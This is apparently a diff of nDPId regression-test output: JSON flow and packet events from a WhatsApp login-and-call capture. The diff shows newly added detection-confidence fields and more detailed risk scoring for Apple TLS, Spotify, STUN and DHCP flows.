 00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1207,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582224208,"flow_last_seen":1432582224417,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1432582347008,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.173.66.102","src_port":49169,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00664{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":1207,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1432582247125,"flow_last_seen":1432582324191,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1432582347008,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":57621,"dst_port":57621,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Spotify","breed":"Acceptable","category":"Music"}}
+00690{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":1207,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1432582247125,"flow_last_seen":1432582324191,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1432582347008,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":57621,"dst_port":57621,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Spotify","breed":"Acceptable","category":"Music"}}
 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1217,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582355253,"flow_last_seen":1432582355253,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1432582355253,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.173.66.102","src_port":49205,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1217,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":1,"flow_last_seen":1432582355253,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1432582355253,"pkt":"xiwDYGpkAPS5Jrv0CABFAABAz7ZAAEAGVELAqAIEEa1CZsA1Abt+ckUjAAAAALAC\/\/9LOwAAAgQFtAEDAwQBAQgKLfwhgQAAAAAEAgAA"}
 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1218,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":2,"flow_last_seen":1432582355393,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1432582355393,"pkt":"APS5Jrv0xiwDYGpkCABFAAA009MAAO8G4TARrUJmwKgCBAG7wDWkxiaffnJFJIASH\/7nbQAAAgQFoAEDAwQBAQQC"}
 00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1219,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":3,"flow_last_seen":1432582355478,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1432582355478,"pkt":"xiwDYGpkAPS5Jrv0CABFAAAoTu9AAEAG1SHAqAIEEa1CZsA1Abt+ckUkpMYmoFAQQAAIJwAA"}
-00879{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1220,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432582355253,"flow_last_seen":1432582355482,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":227,"flow_tot_l4_payload_len":227,"flow_avg_l4_payload_len":56,"midstream":0,"ts_msec":1432582355482,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.173.66.102","src_port":49205,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.AppleStore","breed":"Safe","category":"SoftwareUpdate"},"tls": {"version":"TLSv1.2","client_requested_server_name":"p53-buy.itunes.apple.com","ja3":"799135475da362592a4be9199d258726","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
-00920{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1222,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1432582355253,"flow_last_seen":1432582355622,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":227,"flow_tot_l4_payload_len":319,"flow_avg_l4_payload_len":53,"midstream":0,"ts_msec":1432582355622,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.173.66.102","src_port":49205,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.AppleStore","breed":"Safe","category":"SoftwareUpdate"},"tls": {"version":"TLSv1.2","client_requested_server_name":"p53-buy.itunes.apple.com","ja3":"799135475da362592a4be9199d258726","ja3s":"c253ec3ad88e42f8da4032682892f9a0","unsafe_cipher":2,"cipher":"TLS_RSA_WITH_RC4_128_MD5"}}
-00604{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1249,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582249235,"flow_last_seen":1432582249292,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1432582361725,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"93.62.150.157","src_port":49194,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"}}
+00985{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1220,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432582355253,"flow_last_seen":1432582355482,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":227,"flow_tot_l4_payload_len":227,"flow_avg_l4_payload_len":56,"midstream":0,"ts_msec":1432582355482,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.173.66.102","src_port":49205,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.AppleStore","breed":"Safe","category":"SoftwareUpdate"},"tls": {"version":"TLSv1.2","client_requested_server_name":"p53-buy.itunes.apple.com","ja3":"799135475da362592a4be9199d258726","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
+01026{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1222,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1432582355253,"flow_last_seen":1432582355622,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":227,"flow_tot_l4_payload_len":319,"flow_avg_l4_payload_len":53,"midstream":0,"ts_msec":1432582355622,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.173.66.102","src_port":49205,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.AppleStore","breed":"Safe","category":"SoftwareUpdate"},"tls": {"version":"TLSv1.2","client_requested_server_name":"p53-buy.itunes.apple.com","ja3":"799135475da362592a4be9199d258726","ja3s":"c253ec3ad88e42f8da4032682892f9a0","unsafe_cipher":2,"cipher":"TLS_RSA_WITH_RC4_128_MD5"}}
+00640{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1249,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582249235,"flow_last_seen":1432582249292,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1432582361725,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"93.62.150.157","src_port":49194,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
 00583{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1249,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582249235,"flow_last_seen":1432582249292,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1432582361725,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"93.62.150.157","src_port":49194,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00610{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1249,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582244297,"flow_last_seen":1432582244462,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1432582361725,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.167.142.31","src_port":49164,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Apple","breed":"Safe","category":"Web"}}
+00644{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1249,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582244297,"flow_last_seen":1432582244462,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1432582361725,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.167.142.31","src_port":49164,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}}
 00583{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1249,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582244297,"flow_last_seen":1432582244462,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1432582361725,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.167.142.31","src_port":49164,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00610{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1249,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582249235,"flow_last_seen":1432582249492,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1432582361725,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.167.142.13","src_port":49198,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Apple","breed":"Safe","category":"Web"}}
+00644{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1249,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582249235,"flow_last_seen":1432582249492,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1432582361725,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.167.142.13","src_port":49198,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}}
 00583{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1249,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582249235,"flow_last_seen":1432582249492,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1432582361725,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.167.142.13","src_port":49198,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00620{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1249,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1432582233314,"flow_last_seen":1432582233518,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1432582361725,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"93.186.135.8","src_port":49192,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1249,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1432582233314,"flow_last_seen":1432582233518,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1432582361725,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"93.186.135.8","src_port":49192,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1249,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1432582233314,"flow_last_seen":1432582233518,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1432582361725,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"93.186.135.8","src_port":49192,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00609{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1249,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582245413,"flow_last_seen":1432582245576,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1432582361725,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.172.100.8","src_port":49167,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Apple","breed":"Safe","category":"Web"}}
+00643{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1249,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582245413,"flow_last_seen":1432582245576,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1432582361725,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.172.100.8","src_port":49167,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}}
 00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1249,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582245413,"flow_last_seen":1432582245576,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1432582361725,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.172.100.8","src_port":49167,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00610{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1249,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582235999,"flow_last_seen":1432582236282,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1432582361725,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.172.100.59","src_port":49180,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Apple","breed":"Safe","category":"Web"}}
+00644{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1249,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582235999,"flow_last_seen":1432582236282,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1432582361725,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.172.100.59","src_port":49180,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}}
 00583{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1249,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582235999,"flow_last_seen":1432582236282,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1432582361725,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.172.100.59","src_port":49180,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00610{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1249,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582235998,"flow_last_seen":1432582236282,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1432582361725,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.172.100.37","src_port":49181,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Apple","breed":"Safe","category":"Web"}}
+00644{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1249,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582235998,"flow_last_seen":1432582236282,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1432582361725,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.172.100.37","src_port":49181,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}}
 00583{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1249,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582235998,"flow_last_seen":1432582236282,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1432582361725,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.172.100.37","src_port":49181,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00610{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1249,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582234869,"flow_last_seen":1432582235028,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1432582361725,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.172.100.52","src_port":49182,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Apple","breed":"Safe","category":"Web"}}
+00644{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1249,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582234869,"flow_last_seen":1432582235028,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1432582361725,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.172.100.52","src_port":49182,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}}
 00583{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1249,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582234869,"flow_last_seen":1432582235028,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1432582361725,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.172.100.52","src_port":49182,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00610{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1249,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582233751,"flow_last_seen":1432582233926,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1432582361725,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.172.100.49","src_port":49191,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Apple","breed":"Safe","category":"Web"}}
+00644{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1249,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582233751,"flow_last_seen":1432582233926,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1432582361725,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.172.100.49","src_port":49191,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}}
 00583{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1249,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582233751,"flow_last_seen":1432582233926,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1432582361725,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.172.100.49","src_port":49191,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00734{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":1249,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"finished","flow_packets_processed":464,"flow_first_seen":1432582258730,"flow_last_seen":1432582268457,"flow_idle_time":180000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":483,"flow_tot_l4_payload_len":33432,"flow_avg_l4_payload_len":72,"midstream":0,"ts_msec":1432582361725,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"91.253.176.65","src_port":51518,"dst_port":9344,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}}
-00730{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":1249,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1432582258587,"flow_last_seen":1432582267438,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":660,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1432582361725,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"1.194.90.191","src_port":51518,"dst_port":60312,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}}
-00658{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1432582271840,"flow_last_seen":1432582331780,"flow_idle_time":180000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":3000,"flow_avg_l4_payload_len":300,"midstream":0,"ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DHCP","breed":"Acceptable","category":"Network"}}
-00617{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1432582222253,"flow_last_seen":1432582223191,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":170,"flow_tot_l4_payload_len":876,"flow_avg_l4_payload_len":51,"midstream":1,"ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.172.100.70","src_port":49199,"dst_port":993,"l4_proto":"tcp","ndpi": {"proto":"IMAPS.Apple","breed":"Safe","category":"Web"}}
